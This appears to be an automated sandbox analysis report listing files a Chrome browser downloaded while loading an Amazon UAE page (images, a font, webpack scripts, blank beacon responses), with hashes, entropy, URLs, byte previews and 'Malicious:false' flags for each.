                                                                                                                                                                                                        Preview:......Exif..II*.................Ducky.......1.....2http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.11 (Macintosh)" xmpMM:InstanceID="xmp.iid:85D25C584B8F11EFB329F4B7D982F101" xmpMM:DocumentID="xmp.did:85D25C594B8F11EFB329F4B7D982F101"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:85D25C564B8F11EFB329F4B7D982F101" stRef:documentID="xmp.did:85D25C574B8F11EFB329F4B7D982F101"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...........................................................%$$$%))))))))))................................................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (6950)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):289315
                                                                                                                                                                                                        Entropy (8bit):5.497169430784317
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:1M+1lrOE3MR9lQX4ZVqPnvqy4LdUA1KSG4a1pqjBQw11KsD5XTn5gCrPYtK5gDJy:1M+1lrOE30QX4ZVqPnvqy4LdUA1KSG4X
                                                                                                                                                                                                        MD5:FCC677145B02A91184B82B9B582C618D
                                                                                                                                                                                                        SHA1:58E65BFE5A9137F4E544BEDECAF202F625139BB7
                                                                                                                                                                                                        SHA-256:9515D7B4208E84B9CBA3039A3BFBF11E1454FD07737B830990D015CD0BCA8910
                                                                                                                                                                                                        SHA-512:6D38D4148EB0F2F8FCEAA0D74F24FD4DF61811A54B2C339CDE44AF60471B115BE142FED035E148786F9E5A8F2BF193EDB0FA053FAADF4EC14CC01BF020700836
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/81JyLjGbzQL._RC%7C419fRIwP-FL.js_.js?AUIClients/InContextAuthBaseAssets
                                                                                                                                                                                                        Preview:////////////////////////////////////////////.;(function (packageFunction) {. /* istanbul ignore next */. var p = window.AmazonUIPageJS || window.P;. /* istanbul ignore next */. var attribute = p._namespace || p.attributeErrors;. /* istanbul ignore next */. var namespacedP = attribute ? attribute("FWCIMAssets", "") : p;.. /* istanbul ignore next */. if (namespacedP.guardFatal) {. namespacedP.guardFatal(packageFunction)(namespacedP, window);. } else {. namespacedP.execute(function () {. packageFunction(namespacedP, window);. });. }.}(function(P, window, undefined){.// BEGIN ASSET FWCIMAssets - 4.0./////////////////////////.// BEGIN FILE src/js/fwcim.js./////////////////////////./*...Full source (including license, if applicable) included below..*/./******/ (function(modules) { // webpackBootstrap./******/ .// The module cache./******/ .var installedModules = {};./******/./******/ .// The require function./******/ .function __webpack_require__(moduleId) {./******/.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):11120
                                                                                                                                                                                                        Entropy (8bit):7.962642107553172
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:0yvFQ7o6Yh3e9491agGy0fjuMREv/AoZAtOZDHLZvah6d6l5v4FDDFHbXXqEhJ:0yvFQlYhd1ag7WK2Ev/vCIZrZv16l5QZ
                                                                                                                                                                                                        MD5:75832C9965DEE0F44E31F86F22E90417
                                                                                                                                                                                                        SHA1:6BB83CBCD6574FF8363EAEBE99CC6E5BCD582993
                                                                                                                                                                                                        SHA-256:A762D1EBECF60CA7664ADC978C57C533173D616DD9056CE78274F2C1EDB6B9E7
                                                                                                                                                                                                        SHA-512:243EF43C0E23287CF78C88753907FC4A05A8976B1E0E7DCDF8756A80BE7E7C0D3003C5A5172EA60D5071EECEF92DA265880C2F36C5607BB558188FC67188DB33
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/71PpuvUNQ4L._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..............................................................!.1."A.2Qa.q...#BRt...$DSbr......3CT.......%d.....................................................!.1..a"AQ....#q..23BRr...C...............?..(.....*I.(.....*I.(.....5.z.J].1B?.".N.?mZ.....-..3...aI..W.....-..)tV.MkC]..o..b.7.'qZ..d(.[...(.*.u.T/NZ.G....p..B..~,xE^.........h}I...q...}.R.Cm...Q....wsV?l.....D..o....{3HR_..4..tm........79.P....q..%.hv.Q..v{.....z....won.}..wx...d#...\..].j0jv.....).Y..C..8#. .\.?@.B.8........]..d.C.....o.6..$...n.3~.B..4QE3...QRHQE.$.....=..W/.8.[.!G...51.=...io,.6.)......Oh.......'.*TW8j.....!X...._.8_.iM.5........0./....>....t..7.b.=O?..N..z.J.r.."...q.._z........X.?.O.>.(jI.{9.......D.O..`.q.h}...a.K.._G........5.O....5..h...4...-NP~.o.......b..u~...I$.F6.T}.#...5G:>.4.q..:|.H.e\8...CrW...).".e.y
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):122
                                                                                                                                                                                                        Entropy (8bit):5.308874343028991
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:YMsJDR7qtOllHSaQaXSWXvrEIknpgmivmRzK:YMecOb1iM6npgXvmzK
                                                                                                                                                                                                        MD5:013E48FDBCCBC194CF30774C571904DE
                                                                                                                                                                                                        SHA1:E2AC263A51B43A23C11D358E01C08D3D303AED8E
                                                                                                                                                                                                        SHA-256:8C89E32AEF78CB0EFE9263C5085D571F75DE5A99C6E9925E72F4DDDF4409EACA
                                                                                                                                                                                                        SHA-512:0CAF76871DB90CC1BE329468BD10A3BBF749D93D9D7623AC685C69144A355CE8E94BC1DDBEF2335A68CE90A430978F55EF9B57F9E5CF8E2666465D727603F9DF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:{"icaEligible":true,"token":"hBhy3mxBd06XbeTnYnAsaa2J0EdIr2gOWYC97g4fuIW3AAAAAGa+BPUAAAAB","data":{"CJ_AUTHX_552417":"C"}}
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 285x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):8502
                                                                                                                                                                                                        Entropy (8bit):7.910850923808943
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:XWbG/URbjD9UIdlCFSvuzuVQpFfTDajL6fylcfSPYa0Rjdl:WG/U5xUOCgvV6DLVKlcMT0j3
                                                                                                                                                                                                        MD5:1548D34F6CA5DEBD6DACC991DFC7D29B
                                                                                                                                                                                                        SHA1:0F954DD0D838915FD45B2A7024EA1AD8D77E16CD
                                                                                                                                                                                                        SHA-256:97BB3C0774826C295A17213CC5D4A97B1D8769D020767AE6C5298FD2F6E8F803
                                                                                                                                                                                                        SHA-512:24C99B681D15222EAA326CED3ECFCC64B7C8E848CB231569A07CB21BC9FB8901EE187F48DECA090A93F0918826A47100A95379B26F39447476B432DF6A241C01
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/61lJW9LVKqL._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3................................................................`..]&t.NK.n...Ho..63.....,.LA.L..........O..%..3...7./N.z..u...sw.%.....ME..-...H.d.U..7G..r.1<.21..C#.L.|31...4........zB.K8.uf.GH.....Fd.L..8..f.....a.e%.:?5..........zy...?2.....^n...+.,.....sP..h..U..?..9l.;FX..nQi.S|c.....q~..^..$-.*....d...K.p..K.......f..I...v@9...C6...SQ.#..j.....H..^.2...m.HN6xV+..dIS1K.D.B..k...D.(&?......,.5.=.....bi."..Ov-MX0Y p....H@.l.,.a......e.>n......4v<...)#.(..}.j.~u...#.6b...=..).'..j}...Y.&b....)b ...H0X.l.Q.1..?.Y>...=....Q........3F.AD..2F..3...l..)b_H.x.o......X.Y......2...R...G..R'..-mc.oM..'m.?lz.2@}.k..I..1m.k<.v..VE..,F.............V.*W..-.E..6..B&@.U..T...1k.K...f..?H..................T../.}.h....i'#.$.....f...%2g..*.(Wt....%1.y4..z............&:.7.@.....].r.IBIY9..U...8
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (24182), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):24182
                                                                                                                                                                                                        Entropy (8bit):5.315032386425423
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:Tvn/4G//y4q6IDB5yqO7RH3+o1EXt/CHoOP28BOzJjTbhYcG9LN1VV1XrLcMu3i1:T3XxL1awZgzJbhTGtZcMLzZ6gD23Uj
                                                                                                                                                                                                        MD5:1D6DBC0AA536245BD1B35B964F94E01A
                                                                                                                                                                                                        SHA1:A428BBA0D959C3D78F7DFE6307C5EDE5F1D8AA54
                                                                                                                                                                                                        SHA-256:38D0C94882C0FA40B0030F9564BAE92D902F657DFB954CFA6B53B1BFA083ECFE
                                                                                                                                                                                                        SHA-512:10E0D7982B54660203A46C5DF1B3DAB2C6EE6E379BE9903B11DDAA3ADA92DA355FC8C182B9D742AC5F4DBC71812891798D3F28028746D820A16016A1073E60F5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/41Qtra7lf+L.js
                                                                                                                                                                                                        Preview:var Creative=function(t){var e={};function n(r){if(e[r])return e[r].exports;var o=e[r]={i:r,l:!1,exports:{}};return t[r].call(o.exports,o,o.exports,n),o.l=!0,o.exports}return n.m=t,n.c=e,n.d=function(t,e,r){n.o(t,e)||Object.defineProperty(t,e,{configurable:!1,enumerable:!0,get:r})},n.r=function(t){Object.defineProperty(t,"__esModule",{value:!0})},n.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return n.d(e,"a",e),e},n.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},n.p="",n(n.s=77)}([function(t,e,n){"use strict";n.r(e);var r="undefined"!=typeof MSFClient&&MSFClient;e.default=r},function(t,e,n){"use strict";var r=n(0),o="undefined"!=typeof navigator&&navigator,i=r.default&&r.default.getUserAgentInfo()||o&&o.userAgent;e.a=i},function(t,e,n){"use strict";n.r(e);var r=n(0),o=n(7),i=function(){if(r.default){var t=r.default.getDocumentCookie();return/\"av\":\"([.\d]*)\"/i.test(Object(o.a)(t,"amzn-app-ctxt"))}return!1}();e.default=i},f
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 250x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):7424
                                                                                                                                                                                                        Entropy (8bit):7.895851295460815
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:UqkNjN0k4btFd+TjsXJABYG+BM3zByMRFLI+V:zkv0TbVajsXo2uDnFkC
                                                                                                                                                                                                        MD5:F504DF4F01A7FB2806BC1740053A6AEE
                                                                                                                                                                                                        SHA1:727E76AE1C8050FDE341A0742082BE833469E277
                                                                                                                                                                                                        SHA-256:2215F906725350634BC6C137B7A9BCD0DC346AC338CAA68F156375DFDE8B5AC4
                                                                                                                                                                                                        SHA-512:438ECEB13CCC2BDCB7B30025CC8B2A1123F4F9CB072C610F8A33C3667CF53DBAA6C6B4EECBB9D87F5612EA5003A9B9152EBC4EE9BDAEAEAF678C35FEFF98C48C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5..................................................................X...;...h....v.i..!.2..S..^......#1..J..I...l;.*.T.z...p...........V`.^A8RIN....,:..u7tT..hq..a..bI......{.........8..B...k....RJp..k.>.m-....3...Cn4.e..c...:...{........v..e>.S...X.!...kI..-z..9.>rn.U...6K,.....:._.@........8}.2.R!..v..RJ..qV..H.Eo.NU.........!.....l....m=6...........rR.....m/$..y..K.%.N........%....i..'].....q...=.......Ds+Fs.&)y.6(..$.c..K;...(..G+C..Stb3.c_[y..k}.E;p.....[...Bc..i..kE........t...$s3.....HZ.G..nJ..%mM.t...a.!..Gc...F..j.-*.sc..).i.-...-m ..Q..;..........]\.4vG...A..~...4^.}_..[.p.s5.XZ<..+...^.v9..|..?Q.}.}....lk.a..9.}gj..nC..d....|...,.-....~}...S.[..!........?LS~..G...e..^O+....Q.P...|.).....E..Ez.!b.Vb.!..c~#...5/t..IlRR.@w.1...K]5P..*..x.v......x}...K]N~ ....n.io..z.B.........K.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):71
                                                                                                                                                                                                        Entropy (8bit):4.19644707821733
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                        MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                        SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                        SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                        SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 242x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):6249
                                                                                                                                                                                                        Entropy (8bit):7.851015435743561
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TK1FiH14iAjxbnuOAwb1bNua0gFFTmOIvNdhJVhYifBd0MeKe0RDRdLd1rn9EgD+:irvAw9lTTevdFY40MewtXT9/iME
                                                                                                                                                                                                        MD5:764117234C27EF407726473247DCBBB2
                                                                                                                                                                                                        SHA1:AF70B849181C6FC9DEA9FB9CA6787E1485796A12
                                                                                                                                                                                                        SHA-256:A88E346DC3F70663C42C4A46F1C19FF4F3E35082B4E572B4A930916218D94A59
                                                                                                                                                                                                        SHA-512:05EC358FBBEDFF31BF459D72E6984E8FA529522E85BD56C285D7182FAF240F750DABF07CFEE1845B389947EA5AB4393D3AF461DD2B315684E703EC7F75C35449
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/61f7uyPypDL._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5.............................................................................X....7\F..:{.?4;|.=.P6'......#.N......dWhe-..Q.c5.L.;.............$uAx......D.c.....x<M.;..{~b>.iP.Y7..c...L._d.S..W<d.....@........W._7...N)._+.}.}..l.:........;'`U..#...|.w..Yl0..F..H........8......[N2.E?..}.{..M..-x5.W.7......i....B......m.E;O.H.a.r^.|.s.YE...[.............{.Zbo.f;.{.i...S..F..M....q.Y@2......>(.L....C..'6....`..~.j.$#.......jT..Fz....P...I.X......'/.p.@.H..Rfy........c....duK.%...9.Rs)..z,.qGK.....<.+.........A..5....._t7X...n..q%i'Y............C...kd#=.N.6.T..........-..........................................!.."12@0 3AB..#CQRa.............`.M.?...j%M_U.j?.&wa...g.....6..v.[..%....&O*yP...w..]]_.p.s.\.|%.'......yS.[..RR.Q`.-........`...i._..O"yS.VwX..=.-.i<....&."..q]..8..Q.4c.|.....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 23220, version 1.0
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):23220
                                                                                                                                                                                                        Entropy (8bit):7.992386121959413
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:384:cv6YLnAQlNf6nUw3EhOpHzr4Dt3l+QYxNWufCizUuQ+76ghaivkX3UmfilV:cv6KAy8Ux8TsDT+QACiQuQ+DI8mfk
                                                                                                                                                                                                        MD5:3A49BFC56868E37D88AF0A8C98502AF0
                                                                                                                                                                                                        SHA1:70056995A9F3A8AF43162ECB4D14399F0A1258F2
                                                                                                                                                                                                        SHA-256:2931B4FEF361FB14CEBE167B5C0827F3C00D0651B4AE34AF1EBDA1BCC261C254
                                                                                                                                                                                                        SHA-512:9C1CFEA187895BD8B0532609EF338497BB803689BEB7D71C2FBA06CBA3F9FBDF8FDC2623E7C448A544930744204458D323927FEF8C0CF190D12AB8BA58F62BEA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/S/sash/KwhNPG8Jz-Vz2X7.woff2
                                                                                                                                                                                                        Preview:wOF2......Z...........ZJ........................?FFTM......l..^.`..j.V..e.....$..*..X..6.$..,. ..\..`..A[].q.m...6...D...ql.. R....@....y.Q...9Ie.m..E....!".T@?F....%H..e....a.BSK0wu....2%...q..v.E6.-.IT........Ne...=...........q....N'"+..NV..:.j...w...d.KR..::.G.......`.<n.......d..{..(....y.........M..rlN.d.'..Z{.....`.@..U.Y1...dvX.....?......>....5.....}..915'...........<y2..N.....2.flbmQ..L.d.$v..T@....m..........N.@ST@Q%`......V~..h...k.[.J;.3...."Y....o.e.B.)yWb.=.]00..6.(q.7.o.h..a~....#4}iK.s)}U.RC[zh......*z....b...BX.9~N.u2Y...<.$>(..B.%..AP.K.....{..B.+[......>...>U.6.O.,.9Gm....v..._.9..?...*Tcw...|...?>xw..OE.=n...'.C.......Z..P./....RP..YU.....Q...b.uU_.:..Zj/.3.x.uj..Zw!..A.+\...i.b.Q.O._.s.p.s.6.?.p.<}e..,@A.^.._.%(.<...A."x.p.j......8.....S.....?[=.....R@..E7..m..3.z...<.h....0..H3.y&........j. w...7..j.L..K.N..R...?.j.._.=....Ai..v..!........FU....&..M.....rfH..iR#... ...Jk../.9.|..].8.m..M.H..f....U..V.Q"....T\f0.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):2170
                                                                                                                                                                                                        Entropy (8bit):7.570999281272398
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0r6Hr9/cwFxHT37u+tP2Ag9EfJQD8eIxIbr3PhpVuDIenXzC:TvrVcmxHnq9E4uGX3Z3Whne
                                                                                                                                                                                                        MD5:E2E145F68FF332EFB98DD08440D07874
                                                                                                                                                                                                        SHA1:CE07808F51600F704596840F4B8A6BBCBC4D1907
                                                                                                                                                                                                        SHA-256:C56C07FBED866CD59D8C491637A2F4D9AD647916D2ACEA09D1DEF5613AF3E5F1
                                                                                                                                                                                                        SHA-512:F83B1DE3CC7B99319C943E47B7D3523D734A6314A34798CF101DEB1D89C8B0EDF00168E4EFA48DD887CED7A5717D24749E9026E90B4824E68702B9C0C3BA17D5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745525_372x232_2X_en_AE._SY116_CB558011712_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................!1Aq.#2Qa..."Rrt....3Cc...BDbds..................................................!.12...3q.Aa............?.....X....................................s}.u.....b...kH..W..m....+....a........Dc[.d.jF.....x......RN=...d....iU..:..U..j6|k......-...F.3q.K.<^.`.....Am..99...n+.s...e.."....J0......u^.k]".........Q.5..J.A6...d._L^b..W.N.>..Y...'W.[...-'..~.......y..[.k.&65......%...M..%*...j[>q.z...2.5P..f5...f4'].;.(.U{m7d.p...8..$.9...Ux......]...=...............8G..g...I....fh...=S.)<..}k.>n....uK.\.../..5...-.a)..W.=.....-...-..Vlp...-En...IF;>q.....Q3..;..D.....,|.yK8....*..-...6.Ou/.....{..oY<L....Vj.zm8;a....k..od.v.G..,|*eU.K.S..^..E..g.,}K..\.[..r.z./m....Mu?_q.R.C.W..L.........?. ...._....tg.r......uf...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x39, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):9461
                                                                                                                                                                                                        Entropy (8bit):7.914567271701472
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:D2hRS1YzeKI34hEP58jb35gU6NyOGt7lUoNJqmn7DIWB:9KzrI34yB635ON5A7TJx7DjB
                                                                                                                                                                                                        MD5:46407B5D65AABA2AD7B3633A80475EDE
                                                                                                                                                                                                        SHA1:AE8129386B30ED4D22346D3AFB2C7963D50DA793
                                                                                                                                                                                                        SHA-256:8AFFC3C8715D4CE3AC20C6637BE3920B2A84C3901913E6D8B88F83B2D18056C7
                                                                                                                                                                                                        SHA-512:1524B465D5E5998523096BF8B1BF4B02097B37B9433D163F0351C91F8E42A1CDE211635B305BAFDB6211E4D4BF0B32AC4AB8F6F988384E50957436D601DC3886
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF......................................................................................................................................................'...............7...................................................................._...*.2...qR.D..ET.@.IAT..T.D.....D..@...u..d.2.%.,...D. 5Y..j.K5Y..,.d.2Y..d. 5Y.........?.$......B.-..o.E.mn..Q.?.+.(v..5s.@.kj..#..:_jh...gq.mo..E.K..,...!.j....0..x..J...4+..wpO[A.m........N.O.b-.".4-.1.+.)(.M......Vd.-k.eb..,O...6.....pA.~Our....$.u.\...z.0.c.Z..].%1BH..VO.\q...t.u.PF4D... .......,.g.)V78y9v.~}t...y....u.H..Y.../zb.64.r.<>.a....q.g'....i!..."{V....E.pl.UVe....&.}.X|...r...J[?.f....1H....{.....{.sMF.....o.{....A..Y/7.....&..2Md8w...7_F...|}..<z...3..x..a..Ns....>V..y.....$...s.2Q.....UY...S..b$.J*.J.BJ..d*.J$....J$@J..Es...%Y..,.d.d.%....d.P"Y...fK%Y..D.%....E...6.............................!%1Sd"23. 5AQ.#$4@BRTrt...........[........8.........._]Z....C..U.......(z..}}uJ>...._]N....G..S..k.R...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):71
                                                                                                                                                                                                        Entropy (8bit):4.19644707821733
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                        MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                        SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                        SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                        SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.amazon.ae/rd/uedata?ld&v=0.295223.0&id=B82A0YC1SM3B4A82DCGS&sw=1280&sh=1024&vw=1263&vh=907&m=1&sc=B82A0YC1SM3B4A82DCGS&ue=9&bb=112&ns=404&ne=459&be=887&fp=522&fcp=522&pc=1291&tc=-1087&na_=-1087&ul_=-1723729107980&_ul=-1723729107980&rd_=-1723729107980&_rd=-1723729107980&fe_=-1084&lk_=-1045&_lk=-1045&co_=-1045&_co=-319&sc_=-1045&rq_=-318&rs_=-41&_rs=902&dl_=-31&di_=953&de_=954&_de=967&_dc=1285&ld_=1285&_ld=-1723729107980&ntd=-1&ty=0&rc=0&hob=8&hoe=9&ld=1293&t=1723729109273&ctb=1&rt=__ld:10-4-2-3-2-5-0&csmtags=aui|aui:aui_build_date:3.24.6-2024-08-09|mutObsYes|aui:css:cache|aui:js:cache|ewc:unpersist|ewc:unpersist:emptycart|ewc:bview|ewc|ewc:unrec|ewc:cartsize:0|ewc:aui|navbar|aui:sw:page_proxy:no_ctrl|FWCIMEnabled|fls-eu-amazon-ae|perfYes|mutObsActive|adblk_no&viz=visible:8&pty=i18n-preferences-web&spty=subSelectPreferences&pti=undefined&tid=B82A0YC1SM3B4A82DCGS&aftb=1&lob=1
                                                                                                                                                                                                        Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1], baseline, precision 8, 1940x500, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):94765
                                                                                                                                                                                                        Entropy (8bit):7.824630868878005
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:XElaBISdmlRU+Zk3lvkved+DAMlfPt0sjyZw9vA0ZIe8nKVUvb9Zm:AaBI9gfd+E8PuuUuxZlyZI
                                                                                                                                                                                                        MD5:523FBB27B5717D668DB3E968E1D8E08F
                                                                                                                                                                                                        SHA1:FD6B3457368C115A7B64E18F8A41E2803005AB68
                                                                                                                                                                                                        SHA-256:4F5715CF25A08B349C1A01028C95FF3C670D9DA4289C92D8DF0920F0956F420E
                                                                                                                                                                                                        SHA-512:F7BD222AD03570E1B9C30488D6BF061BE0059CF1C3EC2D5328585C45248F7893518FDD94FBC18975A72C26B45436B973E5FC8C742505D0DD692E72BEE211E88B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/S/al-eu-726f4d26-7fdb/192b0df3-8002-4ca6-8283-ff7193353200.jpg
                                                                                                                                                                                                        Preview:......JFIF.............JExif..II*.......i.........................,...............Version 1.0.0....C....................................................................C......................................................................................................................b...........................!1.AQa.."2q.B....#Rbr...37su.......$6Cc45St....%DTUV.......&8.....(..................................A........................!1.2AQa.."q...BR....#3br....$......CSs.............?...r.........................................................................................................................................................................................................................................................................................@@@@A........................................................................................................................................................................................................................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 118x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8206
                                                                                                                                                                                                        Entropy (8bit):7.962789794101196
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:mTNLVTuOUMAN8Sw1FdyjkxKEH2O39YoEbw7eLOoHpR895iiZJh:mTBVTuOUrN8Sw1FdGkxKEHT+dbw7eioU
                                                                                                                                                                                                        MD5:6D0868091DDA3B515F63D534A924E419
                                                                                                                                                                                                        SHA1:D615F995C1872C6C8BB3DB1ECF06CAF92C14DD6E
